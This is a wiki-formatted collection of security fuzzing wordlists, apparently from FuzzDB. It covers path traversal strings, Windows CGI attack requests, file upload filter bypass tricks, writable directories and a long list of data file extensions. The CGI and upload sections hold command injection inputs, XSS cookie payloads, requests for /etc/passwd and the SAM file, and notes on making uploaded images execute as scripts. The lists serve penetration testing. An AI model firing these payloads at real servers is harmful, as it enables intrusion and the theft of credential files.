./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
